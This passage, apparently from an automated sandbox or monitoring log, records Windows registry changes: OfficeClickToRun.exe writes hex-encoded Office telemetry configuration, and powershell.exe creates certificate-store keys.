502d522d34333238352d31322d32322c502d522d34323438322d312d342c502d522d34303939302d31322d31352c502d522d33393333332d31382d32382c502d522d33353433392d31322d32312c502d522d33333231352d31382d31392c502d522d33313335322d31322d32352c502d442d33343236392d322d352c6772736b693435353a3232373433362c67727573653438383a31393737322c677269636f3430363a31393737372c502d522d34393833302d31382d31352c502d522d34303538362d31382d32372c502d522d33323939362d31382d32342c502d442d34303331362d392d352c502d522d35303432392d31382d382c502d522d36353239352d31382d33302c502d522d36313836312d312d342c502d522d36313733372d312d342c502d522d35313737372d31382d382c502d522d35303932302d312d362c502d522d35303336362d31382d31392c502d522d33353938352d31342d32332c502d522d33353839312d31382d352c502d522d33323030342d322d352c502d522d36383333362d322d342c502d522d36373238362d322d362c502d522d35313531332d322d342c502d522d37393936332d312d322c502d522d35323034332d312d332c502d522d35313736342d312d342c502d522d34393338382d322d362c502d522d34383333352d342d31362c502d522d34373330382d332d392c502d522d34323339322d322d342c502d522d33393037332d312d352c502d522d313132333337362d31302d31302c502d522d313030393835352d31322d31342c502d522d39383835362d31382d34382c502d522d33383431302d31382d32322c502d582d313031393538312d312d332c502d582d313030363137342d312d352c502d522d36363433362d312d342c502d522d36323837332d312d342c502d522d35313039372d312d352c502d522d35303730362d31382d372c502d522d35303035352d31382d372c502d522d34393331352d31382d352c502d522d34323636302d31382d33352c502d522d33363634392d382d392c6f656d69633633393a3339373735332c6f65616c6c3834333a3337353838372c502d522d34323337392d322d332c502d522d34323337382d322d332c502d522d36363533392d312d342c502d522d36363533382d312d342c502d522d36353237382d312d342c502d522d36353237392d312d342c502d522d35393138302d312d342c502d522d34383037302d312d352c502d522d34373338362d312d342c502d522d35353334322d322d322c502d522d35333337372d322d362c502d522d35323438312d322d352c502d522d34393735392d322d382c502d522d34363130302d32302d392c502d522d33383531302d322d31302c502d522d33373535302d32302d31332c502d522d33323138362d4332372d32392c502d522d35383133352d322d342c502d522d35363631382d312d332c502d522d35363032372d312d342c502d522d36313731382d31382d332c502d522d34363134352d31382d31382c502d522d33333839322d312d382c502d522d33333639362d312d352c502d522d35353734392d312d342c502d522d35333636322d312d342c502d522d35323234362d312d342c502d522d35323234352d312d342c502d522d35323233382d312d352c502d522d34333634342d362d31332c502d522d33393931322d312d322c502d522d33393238332d342d31302c502d522d35303338302d31382d31382c502d522d35303337392d31382d31372c502d522d36383134362d312d352c502d522d36333430392d312d352c502d522d35303534322d31382d31342c502d522d35303530302d31382d31362c502d522d34383336352d31382d32342c502d522d34383136312d31382d33322c502d522d34363539372d312d342c502d522d33333733372d312d342c502d452d32393636322d322d332c502d522d32393330332d322d32302c502d522d35363635342d322d342c502d522d35333235362d322d31312c502d522d35313730332d312d352c502d522d35303133332d322d392c502d522d34373234322d31382d31312c502d522d34363431302d312d352c502d522d34353535302d31382d34362c502d522d34353439302d31362d392c502d522d34343838352d31382d32302c502d522d34323531322d312d332c502d522d34303136392d382d31332c502d522d33393730302d322d372c502d522d33373331332d31382d32322c502d522d33363636342d342d342c502d522d33353437362d322d352c502d522d33353430372d342d332c502d522d33353233372d31342d31312c502d522d33353135302d322d342c502d522d33353132392d322d342c502d522d33353035362d342d352c502d522d33343838392d382d342c502d522d33343034342d322d342c502d522d33333731382d362d352c502d522d33333435392d312d352c502d522d33303239322d342d372c502d522d32383634342d312d342c502d522d32343033372d312d372c502d522d32333434352d332d372c502d522d32333433342d332d372c502d522d32333430332d332d382c502d522d31383531332d312d33302c502d442d33343639392d342d342c502d442d33343639372d322d342c502d442d33343637352d312d342c502d442d33343637332d312d342c502d442d33343635342d312d342c502d442d33343538372d332d352c502d442d33343236362d312d342c502d442d33343236322d312d352c502d442d33343236302d312d352c502d442d33343235382d322d352c502d442d33323436352d312d352c502d442d33323435392d322d342c502d442d33323435382d352d342c502d582d313038333432372d322d352c502d522d36393532392d312d352c502d522d36353031312d312d332c502d522d35333632322d31382d342c502d522d35303534312d322d372c502d522d34393839332d32322d392c502d522d33363933322d322d31332c6a683861623434373a3338303633332c502d522d36393233322d31382d31332c502d522d32333638312d322d372c502d442d33323530322d322d332c502d442d33323530312d322d332c502d442d33323431352d322d332c502d522d36343531332d31382d31312c502d522d35313931362d38342d33312c502d522d313234353239362d332d352c502d522d313233363935332d322d342c502d522d313137353739332d312d332c502d522d313135373537302d322d342c502d522d313133323832312d322d342c502d522d313132393233342d312d332c502d522d313131393031332d312d332c502d522d313039383739362d312d332c502d522d313039343434352d312d332c502d522d313038303431322d312d332c502d522d313036393736392d322d342c502d522d313036383131352d312d332c502d522d313034353131382d322d342c502d522d32353236392d31342d32312c502d522d313034343430382d312d332c502d522d313034343134312d372d392c502d522d313033373838372d312d332c502d522d313033373837392d312d332c502d522d313033363239332d312d332c502d522d313033363239322d312d332c502d522d313033363238392d322d342c502d522d313033363238382d312d332c502d522d313033363036382d322d342c502d522d313033353933332d322d342c502d522d313033353134392d322d342c502d522d313033333831372d312d332c502d522d313032383136382d312d332c502d522d313030393731372d332d352c502d522d313030303036312d322d342c502d522d3131373534382d322d342c502d522d3131313638322d312d332c502d522d3130353733312d33362d33382c502d522d3130343433352d31332d31352c502d522d3130303239342d312d332c502d522d39393633332d312d332c502d522d39383932392d322d342c502d522d39383235302d312d332c502d522d39343239392d312d332c502d522d39333037372d312d332c502d522d38363131382d312d332c502d522d38303531372d362d382c502d522d37383131322d342d362c502d522d37373134302d322d342c502d522d37363931382d322d342c502d522d37363732312d312d332c502d522d37353434302d322d342c502d522d37333637362d312d332c502d522d37323434392d372d31302c502d522d37323033302d342d362c502d522d36383036392d322d342c502d522d36363937352d312d332c502d522d36353536372d312d332c502d522d36323231322d322d342c502d522d36303630322d332d352c502d522d35323633332d312d332c502d522d35323137312d322d342c502d522d35323031312d322d342c502d522d35313932312d382d31302c502d522d35313235382d382d31302c502d522d35303735322d322d342c502d522d35303638312d322d342c502d522d35303539392d342d362c502d522d35303539362d342d382c502d522d35303535332d312d332c502d522d34393539372d332d352c502d522d34393435382d322d342c502d522d34383533302d372d392c502d522d34373934382d312d342c502d522d34363538302d332d352c502d522d34363438342d31302d31322c502d522d34363132322d312d332c502d522d34353835382d322d342c502d522d34333936362d322d342c502d522d34333530322d31392d32312c502d522d33383234382d31392d32332c502d522d34313433302d312d332c502d522d34303735312d382d31302c502d522d34303237332d342d362c502d522d33393233382d352d372c502d522d33383638322d332d352c502d522d33373538382d322d342c502d522d33343335352d382d31302c502d522d32363236362d342d392c502d522d32363833342d332d382c502d522d32343636322d31362d32322c502d522d32373437392d362d31312c502d522d32363035362d372d31352c502d522d32373030362d372d31322c502d522d33303333382d332d372c502d522d33303137382d37392d38312c502d522d33303035332d382d31302c502d522d32373435382d312d352c502d522d32353832322d31362d31392c502d522d32353038332d362d392c502d522d32343639302d34322d34362c502d522d32343638392d322d352c502d522d32343636362d322d352c502d522d32343636332d362d31312c502d522d32343635392d372d31302c502d522d32333734342d372d392c502d522d32333733392d372d392c502d522d32333733362d31342d31372c502d522d32333733342d372d392c502d522d32333733302d32312d32342c502d522d32333732332d31302d31322c502d442d33323538382d312d332c502d442d33323533342d312d332c502d442d33323532342d312d332c502d442d33323531382d312d332c502d442d33323531322d312d332c502d442d33323530392d312d332c502d442d33323438352d312d342c502d442d33323438342d312d342c502d442d33323430352d312d332c502d522d313038373134312d342d372c502d522d34393136302d31322d31322c502d522d34373630312d31382d31332c502d522d34363833342d31322d31342c502d522d34363230322d31382d31312c502d522d34343031382d31382d31332c502d522d34333335352d31382d31322c502d522d33353333372d31362d372c502d522d33333931362d312d352c502d522d33333538302d382d392c502d582d3131373430302d312d332c502d522d35393137352d31382d342c502d522d35333239322d31342d31302c502d522d34393133302d31382d32332c502d522d34363931332d31382d382c502d522d33373434392d31382d31352c75786d656469756d69636f6e6c756d696e616e63653a3335333435352c502d522d34383534392d31382d31312c502d522d31393236322d312d31322c502d452d34343737342d322d392c502d522d34343836392d31362d31362c502d522d33333931382d312d31312c502d522d313132383633302d312d372c502d522d313039383431322d312d352c502d522d313039313236372d312d34362c502d522d38313732302d312d322c502d522d35383430362d312d352c502d442d35303639372d322d342c502d442d32393731392d312d312c502d442d32393731382d312d312c502d442d32393539332d312d36222c2022434322203a20227374643a3a77737472696e677c4742222c2022446566436f6e667322203a20227374643a3a77737472696e677c6f6673683663326231746c61316133312c6f666372756934797664756c626633312c6f6668706578336a7a6e65706f6f3331222c202245787054696d6522203a2022696e7436345f747c31373131343938393039222c20224554616722203a20227374643a3a77737472696e677c5c226f696678586359473554744c765a6f6f674a3548514a766f483666366f7951674d487069755436784841513d5c22222c202246434d617022203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e4669785468656d654368616e676551727952657061696e74222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e4c696e6b65645461626c654d616e616765722e536561726368222c20225622203a2022626f C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 = 65735c22203a207b205c224576656e74735c22203a207b205c22496e636f6d70617469626c6543736956657273696f6e44657465637465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224f66666963655c22203a207b205c225375624e616d657370616365735c22203a207b205c2246696c65494f5c22203a207b205c225375624e616d657370616365735c22203a207b205c224353495c22203a207b205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f707469637356325c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6f6373695c22203a207b205c224576656e74735c22203a207b205c22557064617465486f73745469705c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4772617068696373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22415243457863657074696f6e53636f70655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2245326f5669657752656e646572506572666f726d616e636541637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224172745669657756616c69646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f6669745368617065546f54657874436d645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f704c6576656c456666656374447261775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174654269746d617046726f6d506c6174666f726d4269746d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e6b496e70757453757266616365426173655570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e53696d706c65506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224776697a536d61727441727450726f7065727469657354656c656d657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746544657669636544334431305c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22537065637472655472616e73636f646541637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e73657274496e646976696475616c4d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61646564496d61676550726f706572746965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e736572744d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22537065637472654372656174655363656e6541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d6f64656c334452656e64657241637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4964656e74697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22456e7375726550726f7669646572496e697465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574506572736f6e50726f66696c6553657475705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224964656e74697479536e617073686f745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f7669646572466f7241757468536368656d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794964656e74697479506172656e744d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526f616d696e6750726f7879496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564437265645265667265736846726f6d53746f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561644f6e6546726f6d43726564656e7469616c4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22435265616453796e635461736b52756e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f6d61696e4a6f696e65644f72436c6f7564446f6d61696e4a6f696e656453657373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744164616c416363657373546f6b656e46726f6d4372656450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6e666967546f6b656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574426c6f636b696e67536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f70756c617465536572766963654d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657441757468656e74696361746564536572766963655469636b65745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526566726573684964656e7469746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765745365727669636555726c466f7246656465726174696f6e50726f7669646572416e616c797369735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365727669636555726c5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637175697265536572766963655469636b6574466f724144414c5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2253697465735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e496e736967687473222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436163686546696c654e6f7456616c69645c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d616c69645c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c224163746976697479715c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224163746976697479735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573345c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573365c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573375c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573385c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573395c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265667265736843616368656446696c65735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446f776e6c6f61645265736f757263655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2241757468656e7469636174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526573756c7447726f7570546f52656e6465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64576562536f636b6574526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22576562536f636b657450696e67506f6e674c6174656e63795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446961676e6f737469635c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2238564d65686c6c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22356b69614b3747426b7a505746675c22203a207b205c224576656e74735c22203a207b205c22373139305c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c22385c22203a207b205c225375624e616d657370616365735c22203a207b205c227a424b387872415553554e52497859484e4b55415c22203a207b205c224576656e74735c22203a207b205c22393133335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d644d617463685c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c2241637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d68633863674f6a46515c22203a207b205c224576656e74735c22203a207b205c22383635335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22556952756e74696d655c22203a207b205c224576656e74735c22203a207b205c22437265617465576562536f636b65745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250726f636573735265717565737451756575655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e74656e745365727669636550726f78794f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4c6963656e73696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224c6963656e73696e67427573626172416374696f6e5c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c22487244697370617463685375625461736b53746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253617665416c6c536b75696473546f52656769737472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2257616974546f52657472794865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536561726368466f7253657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e554c56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2256616c696461746553657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e4665617475726543616368655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22506572666f726d4c6963656e73696e674e6f74696669636174696f6e735c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224c5655585c22203a207b205c224576656e74735c22203a207b205c224e6f456e7469746c656d656e74735c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c224e6f456e7469746c656d656e74734578706572696d656e74547269676765725c22203a207b205c224576656e74466c61675c22203a203439343038207d207d207d2c205c224f6666696365436c69656e744c6963656e73696e675c22203a207b205c224576656e74735c22203a207b205c224c6963656e7365436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6567616379416374697669747953756363657373436f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c656761637941637469766974794661696c757265436f756e745c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c69656e745c22203a207b205c224576656e74735c22203a207b205c224653686f756c6441637469766174655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224865617274626561745c22203a207b205c224576656e74735c22203a207b205c22577269746543616368655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265616443616368655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c6f61644c6963656e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246756c6c56616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c6f61644c6963656e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f706572746965735c22203a207b205c224576656e74735c22203a207b205c224765744c6963656e736543617465676f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f6b656e697a654c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174654c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224272616e64696e675c22203a207b205c224576656e74735c22203a207b205c22476574 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "17110988,7153487,39965824,41816131,7202265,5804129,17110992,7202269,41484365,24262478,9179409,17962391,508368333,17962392,25036127,24262477,3462423,3702920,3700754,3965062,24262474,4297094,7153421,3462365,18716193,7153435,24262473,9179410,20502174,6308191,18407617,39125643,539756558,6104718,9179411,51475283,41185282,39389248,539756557,528570079" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.6 = 6d656e7473456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617443616c6c6f757455736572496e697455495c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f494d5365727669636573497357616343686174456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f494d536572766963657353664257616343686174456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f494d536572766963657353664357616343686174456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617455494d6f64656c4f6e55494576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617443616c6c6f7574557365724f6e5061727469636970616e744c6973744368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6175746847616c6c65727955736572437265617465416374696f6e4875624c69737446726f6d536e617073686f745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22436f6175746847616c6c65727955736572437265617465466c65784c69737446726f6d536e617073686f745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22436f6c6c61625c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f617574686f725c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f617574686f72446f63756d656e7448656c7065725c22203a207b205c224576656e74735c22203a207b205c22547269676765725265747269657665446f63756d656e74436f617574686f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225265747269657665456469746f72735461626c654d616e616765725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225265747269657665527463557365725c22203a207b205c224576656e74466c61675c22203a20353132207d207d207d207d207d207d207d2c205c2241744d656e74696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22446f63756d656e744163746976697479496e746567726174696f6e5c22203a207b205c224576656e74735c22203a207b205c224164645265636f7665726564416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f6365737341744d656e74696f6e4e6f74696669636174696f6e734c6973745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6d6d656e74734e6f74696669636174696f6e436f6c6c6563746f7252656d6f766564436f6d6d656e74735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f63657373436f6d6d656e74734e6f74696669636174696f6e734c6973745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22536176654c6f67466f725265636f766572795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22437265617465446f63756d656e7441637469766974794c6f674d616e616765725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c657465436f6d6d656e7441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22446973636172644c6f63616c416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574655265706c7941637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2243726561746541744d656e74696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c65746541744d656e74696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574654d6f6465726e436f6d6d656e7441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224372656174654d6f6465726e41744d656e74696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f70656e4c6f6746726f6d5265636f766572795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574654d6f6465726e5265706c7941637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225064616c6d446f63756d656e7441637469766974794c6f674d616e616765725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22456e73757265446f63756d656e744163746976697479436170747572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e737572654c6f67507265526571735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d6574726f4f70656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746555736572496e666f466f72417574686f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22437265617465556e